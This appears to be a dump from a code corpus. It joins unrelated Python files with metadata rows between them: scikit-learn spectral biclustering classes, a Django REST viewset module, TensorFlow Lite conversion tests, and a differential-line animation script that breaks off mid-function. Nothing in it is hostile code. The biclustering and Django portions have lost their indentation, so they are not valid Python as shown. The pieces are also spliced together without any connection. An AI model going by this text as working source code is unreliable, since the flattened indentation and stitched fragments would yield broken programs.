X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
            dist = norm(X_scaled.data - X_new.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
check_array_ndim(X)
self._check_parameters()
self._fit(X)
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
_, v = eigsh(safe_sparse_dot(array.T, array),
ncv=self.n_svd_vecs)
vt = v.T
if np.any(np.isnan(u)):
_, u = eigsh(safe_sparse_dot(array, array.T),
ncv=self.n_svd_vecs)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
        `svd_method` is 'randomized'.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
The bicluster label of each row.
`column_labels_` : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
        `svd_method` is 'randomized'.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
Row partition labels.
`column_labels_` : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
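        # Checkerboard biclustering steps: (1) normalize X with the chosen
        # scheme, (2) compute n_components singular vector pairs (discarding
        # the trivial first pair unless method='log'), (3) keep the n_best
        # vectors that are best approximated by piecewise-constant vectors
        # found via k-means, (4) project the data onto those vectors and
        # cluster rows and columns separately to get the two partitions.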
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
| bsd-3-clause | 3,698,149,455,247,156,700 | 38.554656 | 79 | 0.56607 | false |
TangentMicroServices/BuildService | api/views.py | 1 | 2442 | from django.contrib.auth.models import User
from api.models import Build, Metric, Smell
from rest_framework import routers, serializers, viewsets, decorators, response
from api.permissions import IsSelfOrSuperUser
from api.serializers import BuildSerializer, MetricSerializer, SmellSerializer
from rest_framework.permissions import IsAuthenticated, AllowAny
# Serializers define the API representation.
class MetricViewSet(viewsets.ModelViewSet):
queryset = Metric.objects.all()
serializer_class = MetricSerializer
class BuildViewSet(viewsets.ModelViewSet):
queryset = Build.objects.all()
serializer_class = BuildSerializer
class SmellViewSet(viewsets.ModelViewSet):
queryset = Smell.objects.all()
serializer_class = SmellSerializer
class HealthViewSet(viewsets.ViewSet):
permission_classes = (AllowAny, )
def list(self, request, format=None):
# make sure we can connect to the database
all_statuses = []
status = "up"
db_status = self.__can_connect_to_db()
all_statuses.append(db_status)
if "down" in all_statuses:
status = "down"
data = {
"data": {
"explorer": "/api-explorer",
},
"status": {
"db": db_status,
"status": status
}
}
return response.Response(data)
def __can_connect_to_db(self):
try:
user = User.objects.first()
return "up"
except Exception:
return "down"
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'health', HealthViewSet, base_name='health')
router.register(r'build', BuildViewSet, base_name='build')
router.register(r'metric', MetricViewSet, base_name='metric')
router.register(r'smell', SmellViewSet, base_name='smell')
"""
List all users.
**Notes:**
* Requires authenticated user
**Example usage:**
import requests
response = requests.get('/users/')
**Example response:**
[
{
"url": "http://192.168.99.100:8000/users/1/",
"username": "admin",
"email": "[email protected]",
"is_staff": true,
"first_name": "",
"last_name": ""
}
]
---
responseMessages:
- code: 403
message: Not authenticated
consumes:
- application/json
produces:
- application/json
""" | mit | 4,265,018,532,309,362,000 | 22.266667 | 79 | 0.63145 | false |
jhseu/tensorflow | tensorflow/lite/python/convert_test.py | 1 | 17122 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Lite Python Interface: Sanity check."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.lite.python import convert
from tensorflow.lite.python import lite_constants
from tensorflow.lite.python import op_hint
from tensorflow.lite.python.interpreter import Interpreter
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.graph_util_impl import _bfs_for_reachable_nodes
from tensorflow.python.framework.graph_util_impl import _extract_graph_summary
from tensorflow.python.framework.graph_util_impl import _node_name
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ConvertTest(test_util.TensorFlowTestCase):
def testBasic(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Try running on valid graph
tflite_model = convert.toco_convert(sess.graph_def, [in_tensor],
[out_tensor])
self.assertTrue(tflite_model)
def testQuantization(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor + in_tensor, min=0., max=1.)
sess = session.Session()
tflite_model = convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8,
quantized_input_stats=[(0., 1.)])
self.assertTrue(tflite_model)
def testQuantizationInvalid(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor + in_tensor, min=0., max=1.)
sess = session.Session()
with self.assertRaises(ValueError) as error:
convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
with self.assertRaises(ValueError) as error:
convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8,
inference_input_type=lite_constants.FLOAT)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
def testGraphDefBasic(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="input")
_ = in_tensor + in_tensor
sess = session.Session()
tflite_model = convert.toco_convert_graph_def(
sess.graph_def, [("input", [1, 16, 16, 3])], ["add"],
enable_mlir_converter=False,
inference_type=lite_constants.FLOAT)
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual("input", input_details[0]["name"])
self.assertEqual(np.float32, input_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[0]["shape"]).all())
self.assertEqual((0., 0.), input_details[0]["quantization"])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual("add", output_details[0]["name"])
self.assertEqual(np.float32, output_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == output_details[0]["shape"]).all())
self.assertEqual((0., 0.), output_details[0]["quantization"])
def testGraphDefQuantization(self):
with ops.Graph().as_default():
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputA")
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputB")
_ = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name="output")
sess = session.Session()
input_arrays_map = [("inputA", [1, 16, 16, 3]), ("inputB", [1, 16, 16, 3])]
output_arrays = ["output"]
tflite_model = convert.toco_convert_graph_def(
sess.graph_def,
input_arrays_map,
output_arrays,
enable_mlir_converter=False,
inference_type=lite_constants.QUANTIZED_UINT8,
quantized_input_stats=[(0., 1.), (0., 1.)])
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual("inputA", input_details[0]["name"])
self.assertEqual(np.uint8, input_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[0]["shape"]).all())
self.assertEqual((1., 0.),
input_details[0]["quantization"]) # scale, zero_point
self.assertEqual("inputB", input_details[1]["name"])
self.assertEqual(np.uint8, input_details[1]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[1]["shape"]).all())
self.assertEqual((1., 0.),
input_details[1]["quantization"]) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual("output", output_details[0]["name"])
self.assertEqual(np.uint8, output_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == output_details[0]["shape"]).all())
self.assertTrue(output_details[0]["quantization"][0] > 0) # scale
def testGraphDefQuantizationInvalid(self):
with ops.Graph().as_default():
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputA")
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputB")
_ = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name="output")
sess = session.Session()
input_arrays_map = [("inputA", [1, 16, 16, 3]), ("inputB", [1, 16, 16, 3])]
output_arrays = ["output"]
with self.assertRaises(ValueError) as error:
convert.toco_convert_graph_def(
sess.graph_def,
input_arrays_map,
output_arrays,
enable_mlir_converter=False,
inference_type=lite_constants.QUANTIZED_UINT8)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
class ConvertTestOpHint(test_util.TensorFlowTestCase):
"""Test the hint to stub functionality."""
def _getGraphOpTypes(self, graphdef, output_nodes):
"""Returns used op types in `graphdef` reachable from `output_nodes`.
This is used to check that after the stub transformation the expected
nodes are there.
    NOTE: this is not an exact test that the graph is the correct output, but
    it balances compact expressibility of the test with sanity checking.
Args:
graphdef: TensorFlow proto graphdef.
output_nodes: A list of output node names that we need to reach.
Returns:
A set of node types reachable from `output_nodes`.
"""
name_to_input_name, name_to_node, _ = (
_extract_graph_summary(graphdef))
# Find all nodes that are needed by the outputs
used_node_names = _bfs_for_reachable_nodes(output_nodes, name_to_input_name)
return set([name_to_node[node_name].op for node_name in used_node_names])
def _countIdentities(self, nodes):
"""Count the number of "Identity" op types in the list of proto nodes.
Args:
nodes: NodeDefs of the graph.
Returns:
The number of nodes with op type "Identity" found.
"""
return len([x for x in nodes if x.op == "Identity"])
def testSwishLiteHint(self):
"""Makes a custom op swish and makes sure it gets converted as a unit."""
with ops.Graph().as_default():
image = array_ops.constant([1., 2., 3., 4.])
swish_scale = array_ops.constant(1.0)
def _swish(input_tensor, scale):
custom = op_hint.OpHint("cool_activation")
input_tensor, scale = custom.add_inputs(input_tensor, scale)
output = math_ops.sigmoid(input_tensor) * input_tensor * scale
output, = custom.add_outputs(output)
return output
output = array_ops.identity(
_swish(image, swish_scale), name="ModelOutput")
with self.cached_session() as sess:
# check if identities have been put into the graph (2 input, 1 output,
# and 1 final output).
self.assertEqual(self._countIdentities(sess.graph_def.node), 4)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["cool_activation", "Const", "Identity"]))
def testScaleAndBiasAndIdentity(self):
"""This tests a scaled add which has 3 inputs and 2 outputs."""
with ops.Graph().as_default():
a = array_ops.constant(1.)
x = array_ops.constant([2., 3.])
b = array_ops.constant([4., 5.])
def _scaled_and_bias_and_identity(a, x, b):
custom = op_hint.OpHint("scale_and_bias_and_identity")
a, x, b = custom.add_inputs(a, x, b)
return custom.add_outputs(a * x + b, x)
output = array_ops.identity(
_scaled_and_bias_and_identity(a, x, b), name="ModelOutput")
with self.cached_session() as sess:
# make sure one identity for each input (3) and output (2) => 3 + 2 = 5
# +1 for the final output
self.assertEqual(self._countIdentities(sess.graph_def.node), 6)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["scale_and_bias_and_identity", "Const", "Identity", "Pack"]))
def testTwoFunctions(self):
"""Tests if two functions are converted correctly."""
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([1.])
def _double_values(x):
custom = op_hint.OpHint("add_test")
x, = custom.add_inputs(x)
output = math_ops.multiply(x, x)
output, = custom.add_outputs(output)
return output
output = array_ops.identity(
math_ops.add(_double_values(a), _double_values(b)),
name="ModelOutput")
with self.cached_session() as sess:
# make sure one identity for each input (2) and output (2) => 2 + 2
# +1 for the final output
self.assertEqual(self._countIdentities(sess.graph_def.node), 5)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["add_test", "Const", "Identity", "Add"]))
def _get_input_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_INPUT_INDEX_ATTR].i
def _get_output_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_OUTPUT_INDEX_ATTR].i
def _get_sort_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_SORT_INDEX_ATTR].i
def testTags(self):
"""Test if multiple args with the same tag are grouped."""
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([2.])
c = array_ops.constant([3.])
d = array_ops.constant([4.])
custom = op_hint.OpHint("test_tag")
a = custom.add_input(
a, tag="mytag", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b, = custom.add_inputs(b)
c = custom.add_input(
c, tag="mytag", aggregate=op_hint.OpHint.AGGREGATE_STACK)
d = custom.add_input(
d, tag="mytag2", aggregate=op_hint.OpHint.AGGREGATE_STACK)
res = math_ops.add(math_ops.mul(a, b), math_ops.mul(c, b))
custom.add_outputs([res])
with self.cached_session():
self.assertEqual(self._get_input_index(a), 0)
self.assertEqual(self._get_sort_index(a), 0)
self.assertEqual(self._get_input_index(b), 1)
self.assertEqual(self._get_sort_index(b), 0)
self.assertEqual(self._get_input_index(c), 0)
self.assertEqual(self._get_sort_index(c), 1)
def testOverrideIndex(self):
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([2.])
c = array_ops.constant([3.])
custom = op_hint.OpHint("test_override")
b = custom.add_input(b) # should auto assign 0
a = custom.add_input(a, index_override=1)
c = custom.add_input(c) # should auto assign 2
with self.cached_session():
self.assertEqual(self._get_input_index(a), 1)
self.assertEqual(self._get_input_index(b), 0)
self.assertEqual(self._get_input_index(c), 2)
def testAggregate(self):
with ops.Graph().as_default():
a = array_ops.constant([3., 4.])
b = array_ops.constant([5., 6.])
hint = op_hint.OpHint("agg")
a0, a1 = array_ops.unstack(a)
b0, b1 = array_ops.unstack(b)
a0 = hint.add_input(a0, tag="c", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b0 = hint.add_input(b0, tag="n", aggregate=op_hint.OpHint.AGGREGATE_STACK)
a1 = hint.add_input(a1, tag="c", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b1 = hint.add_input(b1, tag="n", aggregate=op_hint.OpHint.AGGREGATE_STACK)
c0 = math_ops.add(a0, b0, name="addleft")
c1 = math_ops.add(a1, b1, name="addright")
c0 = hint.add_output(
c0, tag="out", aggregate=op_hint.OpHint.AGGREGATE_STACK)
c1 = hint.add_output(
c1, tag="out", aggregate=op_hint.OpHint.AGGREGATE_STACK)
curr = array_ops.stack([c0, c1])
output = array_ops.identity(curr, name="FINAL_OUTPUT")
with self.cached_session() as sess:
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["agg", "Const", "Identity"]))
def testFindHintedOutputNodes(self):
"""Test if all hinted output nodes are correctly found."""
with ops.Graph().as_default():
def _build_ophinted_op(name, input1, input2):
custom_op = op_hint.OpHint(name)
input1 = custom_op.add_input(input1)
input2 = custom_op.add_input(input2)
output = math_ops.mul(input1, input2)
return custom_op.add_output(output)
output_1 = _build_ophinted_op("custom_op_1", array_ops.constant([1.]),
array_ops.constant([2.]))
output_2 = _build_ophinted_op("custom_op_2", array_ops.constant([3.]),
array_ops.constant([4.]))
with self.cached_session() as sess:
hinted_outputs_nodes = op_hint.find_all_hinted_output_nodes(sess)
expected_hinted_output_nodes = [
_node_name(output_1.name),
_node_name(output_2.name)
]
self.assertEqual(
len(hinted_outputs_nodes), len(expected_hinted_output_nodes))
if __name__ == "__main__":
test.main()
| apache-2.0 | -2,934,640,926,344,554,500 | 39.382075 | 80 | 0.632753 | false |
inconvergent/differential-line | main_line_ani.py | 1 | 2648 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
from numpy import pi
# from numpy import cos
# from numpy import sin
from numpy.random import random
from numpy import zeros
# from numpy import linspace
from numpy import floor
from modules.growth import spawn_curl
NMAX = 10**6
SIZE = 512
ONE = 1./SIZE
PROCS = 2
INIT_NUM = 10
STP = ONE*0.1
NEARL = 4*ONE
FARL = 100*ONE
MID = 0.5
LINEWIDTH = 5.*ONE
BACK = [1,1,1,1]
FRONT = [0,0,0,0.05]
TWOPI = pi*2.
grains = 10
np_coords = zeros(shape=(NMAX,4), dtype='float')
np_vert_coords = zeros(shape=(NMAX,2), dtype='float')
def steps(df):
from time import time
from modules.helpers import print_stats
t1 = time()
df.optimize_position(STP)
spawn_curl(df, NEARL)
if df.safe_vertex_positions(3*STP)<0:
print('vertices reached the boundary. stopping.')
return False
t2 = time()
print_stats(0, t2-t1, df)
return True
def main():
from iutils.render import Animate
from differentialLine import DifferentialLine
from fn import Fn
from modules.show import sandstroke
from modules.show import dots
DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)
## arc
# angles = sorted(random(INIT_NUM)*pi*1.5)
# xys = []
# for a in angles:
# x = 0.5 + cos(a)*0.06
# y = 0.5 + sin(a)*0.06
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
## vertical line
#xx = sorted(0.45+0.1*random(INIT_NUM))
#yy = MID+0.005*(0.5-random(INIT_NUM))
#xys = []
#for x,y in zip(xx,yy):
#xys.append((x,y))
#DF.init_line_segment(xys, lock_edges=1)
# diagonal line
# yy = sorted(0.3+0.4*random(INIT_NUM))
# xx = 0.3+linspace(0,0.4,num=INIT_NUM)
# xys = []
# for x,y in zip(xx,yy):
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
angles = sorted(random(INIT_NUM)*TWOPI)
DF.init_circle_segment(MID,MID,FARL*0.2, angles)
fn = Fn(prefix='./res/', postfix='.png')
def wrap(render):
global np_coords
global np_vert_coords
global grains
## if fn is a path each image will be saved to that path
if not render.steps%3:
f = fn.name()
else:
f = None
grains += (-1)**floor(2*random())
print(grains)
if grains<0:
grains = 0
res = steps(DF)
render.set_front(FRONT)
coord_num = DF.np_get_edges_coordinates(np_coords)
sandstroke(render,np_coords[:coord_num,:],grains,f)
if not random()<0.1:
vert_num = DF.np_get_vert_coordinates(np_vert_coords)
dots(render,np_vert_coords[:vert_num,:],None)
return res
